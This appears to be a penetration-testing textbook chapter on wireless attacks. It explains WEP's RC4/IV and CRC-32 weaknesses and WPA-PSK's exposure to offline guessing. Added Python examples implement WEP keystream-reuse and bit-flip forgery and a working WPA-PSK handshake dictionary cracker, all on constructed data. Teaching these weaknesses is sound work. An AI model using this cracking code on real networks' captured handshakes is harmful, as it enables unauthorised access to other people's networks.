Chapter 8. Wireless Penetration

Wireless networks have become increasingly popular for personal and business use. Unfortunately, for wireless networks as for most other technological advances, security has been an afterthought. Thus, the current state of wireless technology is such that wireless networks in general are not secure by default and cannot be easily secured. The three tools (Aircrack, Airpwn, and Karma) presented in this chapter take advantage of weaknesses in 802.11 wireless networks in order to compromise them.

Aircrack monitors legitimate wireless traffic in order to crack the encryption key being used. Knowing this key allows an attacker to access the wireless network and paves the way for further attacks. Aircrack is introduced in Aircrack.

Airpwn monitors legitimate wireless traffic and, based on preconfigured search patterns, injects attacker-controlled data into the network, thus allowing for sophisticated attacks. Airpwn can use the WEP key uncovered by Aircrack to compromise encrypted networks. Airpwn is introduced in Airpwn.

Karma impersonates wireless networks, tricking careless wireless clients into connecting to an attacker-controlled network. Karma is introduced in Karma.

The chapter starts with a discussion of wireless encryption technology to establish the current state of wireless security.

Wired Equivalent Privacy (WEP) is one method of securing the network. It is part of the original IEEE 802.11 standard, so most wireless vendors include it in their products by default. Upon initial release, WEP was considered a real advance in wireless security because it prevented eavesdroppers from intercepting and reading wireless network traffic. It also helped to prevent unauthorized individuals from using the wireless network because without the WEP key, they could not produce frames that the access point would accept. It's important to understand WEP before examining the tools discussed in later sections, especially Aircrack.

Let's take a look at how a wireless network works and, in particular, how WEP works. As you may already know, a wireless or Wi-Fi network uses radio signals to transmit data from connected PCs to a router, out to the Internet, and back again. Most wireless networks use either the 2.4 GHz or the 5 GHz band. As just mentioned, most standard wireless routers built to the IEEE 802.11 standard have built-in (but not enabled by default) encryption intended to secure the traffic between systems and routers. Initially, most users did not bother enabling WEP; it wasn't the most user-friendly thing to do, and managing the key was an annoyance. Over the last few years, as the lack of security in wireless networks has received more attention, users have started to enable the built-in encryption in the hope that it will make them secure. By the end of this section, you will understand that while WEP does add a level of protection, it does not prevent a wireless network from being compromised.

WEP uses the RC4 stream cipher (one of the ciphers also used in Secure Sockets Layer, SSL) for confidentiality, and a CRC-32 checksum, the integrity check value (ICV), for integrity. Basically, there are two options a user can choose when using WEP: 64-bit and 128-bit. 64-bit WEP is obviously weaker than 128-bit, but both keys can be recovered if enough encrypted network traffic is captured. The construction is as follows: 64-bit WEP uses a 40-bit secret key, to which a 24-bit initialization vector (IV) is prepended to form the per-frame RC4 key; 128-bit WEP uses a 104-bit secret key with the same 24-bit IV. The IV is transmitted in the clear at the start of each frame so that the receiver can reconstruct the same RC4 key. So what's the problem? A stream cipher's keystream must never be used twice: XORing two frames encrypted with the same keystream cancels the keystream and leaves the XOR of the two plaintexts, from which either plaintext can be recovered once the other is known or guessed. The IV exists to guarantee a fresh keystream for every frame, but 24 bits allow only about 16.7 million values, which a busy network exhausts in a matter of hours (and randomly chosen IVs are expected to repeat after only a few thousand frames). Worse, because the IV is simply prepended to the secret key, weaknesses in RC4's key scheduling let an attacker who collects enough frames carrying certain IVs recover the secret key itself by statistical analysis; that is the attack Aircrack automates. The CRC-32 ICV adds no real protection either: CRC is linear, so an attacker can flip chosen bits in a ciphertext and patch the encrypted ICV to match without knowing the key.
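The following is an added example, not code from the book or from Aircrack: a small model of the WEP construction just described (IV prepended to the secret key as the RC4 key, CRC-32 ICV appended before encryption), used to show three of the weaknesses concretely. The key, IV and plaintexts are constructed for illustration. Beyond the text above, it also demonstrates the CRC-32 linearity that lets an attacker patch the ICV after flipping bits, and it puts a number on how soon randomly chosen 24-bit IVs are expected to collide.

```python
import math
import struct
import zlib

# Added example (not from the book). Constructed 40-bit key and 24-bit IV;
# nothing here is captured from a real network.
KEY_40BIT = bytes.fromhex("0102030405")   # constructed 64-bit-WEP secret key
IV = bytes.fromhex("aabbcc")              # constructed 24-bit initialization vector


def rc4_keystream(key: bytes, length: int) -> bytes:
    """RC4 key scheduling followed by the PRGA; returns `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    while len(out) < length:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings over their common length."""
    return bytes(x ^ y for x, y in zip(a, b))


def crc32_le(data: bytes) -> bytes:
    """CRC-32 as WEP carries it: 4 bytes, little-endian."""
    return struct.pack("<I", zlib.crc32(data) & 0xFFFFFFFF)


def wep_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Frame body = IV || RC4(IV || key) XOR (plaintext || CRC-32 ICV)."""
    if len(iv) != 3 or len(key) not in (5, 13):
        raise ValueError("IV must be 24 bits; key must be 40 or 104 bits")
    body = plaintext + crc32_le(plaintext)
    return iv + xor_bytes(body, rc4_keystream(iv + key, len(body)))


def wep_decrypt(key: bytes, frame: bytes):
    """Return the plaintext if the ICV verifies, otherwise None."""
    iv, body = frame[:3], frame[3:]
    plain = xor_bytes(body, rc4_keystream(iv + key, len(body)))
    data, icv = plain[:-4], plain[-4:]
    return data if crc32_le(data) == icv else None


def keystream_reuse_leak(frame_a: bytes, frame_b: bytes):
    """Two frames under the same key and IV share one keystream, so XORing
    their ciphertexts cancels it and yields plaintext_a XOR plaintext_b.
    Returns that XOR (over the common length), or None if the IVs differ."""
    if frame_a[:3] != frame_b[:3]:
        return None
    return xor_bytes(frame_a[3:], frame_b[3:])


def flip_bits(frame: bytes, delta: bytes) -> bytes:
    """CRC-32 is linear: crc(p ^ d) == crc(p) ^ crc(d) ^ crc(zeros), so an
    attacker can XOR `delta` into the encrypted data and patch the encrypted
    ICV to match, all without the key. `delta` must span the whole data field."""
    iv, body = frame[:3], frame[3:]
    if len(delta) != len(body) - 4:
        raise ValueError("delta must be exactly as long as the data field")
    icv_delta = xor_bytes(crc32_le(delta), crc32_le(bytes(len(delta))))
    return iv + xor_bytes(body, delta + icv_delta)


def frames_until_iv_repeat(iv_bits: int = 24) -> float:
    """Birthday bound for randomly chosen IVs: a repeat is expected after about
    sqrt(pi/2 * 2**iv_bits) frames, roughly 5,100 for 24 bits. Cards that count
    IVs sequentially instead wrap after 2**24 = 16,777,216 frames."""
    return math.sqrt(math.pi / 2 * 2 ** iv_bits)
```

To see the reuse leak, encrypt two frames with the same IV, XOR the results, and XOR in one known plaintext (a predictable HTTP request line, say) to read the other; to see the ICV weakness, pass a difference mask to `flip_bits` and observe that `wep_decrypt` still accepts the forged frame. The key-recovery attack itself (the statistical analysis of weak-IV frames that Aircrack performs) is not modelled here.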

In response to the weaknesses discovered in WEP, a new method for encrypting traffic was introduced, known as Wi-Fi Protected Access (WPA). In its enterprise mode, WPA authenticates each client through 802.1X and gives each device its own master key. Unfortunately, WPA also includes a shared-key mode, WPA-PSK, in which every device derives the same master key from one shared passphrase, weakening the security of the protocol. WPA's Temporal Key Integrity Protocol (TKIP) still encrypts with the RC4 stream cipher (so that it can run on existing WEP hardware), but it uses a 128-bit key and a 48-bit initialization vector that doubles as a packet sequence counter, and it mixes a fresh per-packet key from the IV rather than simply prepending the IV to a static key; it also replaces the CRC-32 ICV with a keyed message integrity check. The combination of TKIP's per-packet key mixing and the larger 48-bit IV defeats the attacks that succeed against WEP. But when WPA is used with a preshared key (WPA-PSK), the master key is derived only from the passphrase and the network name, so an attacker who captures a single client's handshake can test candidate passphrases offline, which makes weak passphrases vulnerable to simple but effective dictionary and brute-force password-guessing attacks.
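The following is an added example, not code from the book or from any of the tools it covers: it reproduces the WPA-PSK key derivation (passphrase and SSID to pairwise master key via PBKDF2-HMAC-SHA1, then the per-session pairwise transient key from both MAC addresses and both handshake nonces) and runs the offline dictionary attack that a captured 4-way handshake makes possible. The SSID, MAC addresses, nonces, EAPOL-Key bytes, secret passphrase and wordlist are all constructed; `build_capture` stands in for a sniffer so the example runs offline.

```python
import hashlib
import hmac
from typing import Optional

# Added example (not from the book). Everything below the key-derivation
# functions is a constructed stand-in for a sniffed 4-way handshake.


def wpa_pmk(passphrase: str, ssid: str) -> bytes:
    """PSK mode: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    Every station on the network derives this same PMK from the same passphrase."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key: bytes, label: bytes, data: bytes) -> bytes:
    """802.11i PRF-512: concatenation of HMAC-SHA1(key, label || 0x00 || data || i)."""
    out = b"".join(
        hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4)
    )
    return out[:64]


def wpa_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Per-session PTK from the PMK, both MAC addresses and both handshake nonces.
    The first 16 bytes (KCK) key the handshake MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes, descriptor_version: int = 1) -> bytes:
    """Key MIC over the EAPOL-Key frame with its MIC field zeroed.
    Descriptor version 1 (WPA/TKIP) uses HMAC-MD5; version 2 (WPA2/CCMP) HMAC-SHA1[:16]."""
    if descriptor_version == 1:
        return hmac.new(kck, eapol_mic_zeroed, hashlib.md5).digest()
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


# --- constructed "capture": what a sniffer records of the 4-way handshake ---
SSID = "linksys"
AP_MAC = bytes.fromhex("00a0c9112233")      # constructed authenticator address
STA_MAC = bytes.fromhex("001e4c445566")     # constructed supplicant address
ANONCE = bytes(range(32))                   # constructed nonces
SNONCE = bytes(range(32, 64))
# Constructed stand-in for EAPOL-Key message 2 with its 16-byte MIC field zeroed.
EAPOL_MSG2 = bytes.fromhex("0103007502010a00") + bytes(16) + SNONCE + bytes(32)
SECRET_PASSPHRASE = "letmein123"            # what the network uses; unknown to the attacker


def build_capture(passphrase: str) -> dict:
    """Simulate the client's side of the handshake to obtain the MIC a sniffer
    would record. With a real capture, `mic` comes straight off the air."""
    ptk = wpa_ptk(wpa_pmk(passphrase, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    return {
        "ssid": SSID, "aa": AP_MAC, "spa": STA_MAC,
        "anonce": ANONCE, "snonce": SNONCE, "eapol": EAPOL_MSG2,
        "mic": eapol_mic(ptk[:16], EAPOL_MSG2),
    }


CAPTURE = build_capture(SECRET_PASSPHRASE)
WORDLIST = ["password", "admin", "wireless", "letmein123", "linksys"]   # constructed


def crack_wpa_psk(capture: dict, wordlist) -> Optional[str]:
    """Offline attack: for each candidate passphrase derive PMK -> PTK -> KCK and
    check whether it reproduces the captured MIC. No traffic is sent to the network,
    so lockouts and rate limits on the access point never come into play."""
    for candidate in wordlist:
        pmk = wpa_pmk(candidate, capture["ssid"])
        ptk = wpa_ptk(pmk, capture["aa"], capture["spa"],
                      capture["anonce"], capture["snonce"])
        if hmac.compare_digest(eapol_mic(ptk[:16], capture["eapol"]), capture["mic"]):
            return candidate
    return None
```

Two points the code makes visible: the PTK differs for every client and every association because the nonces and MAC addresses feed into it, which is why WPA-PSK is not trivially "one key for everyone" on the air; but the PMK above it depends only on the passphrase and SSID, so one captured handshake is enough to test guesses against the whole network. The 4096 PBKDF2 iterations per guess are what make the attack slow, not what make it fail; a short or dictionary passphrase still falls.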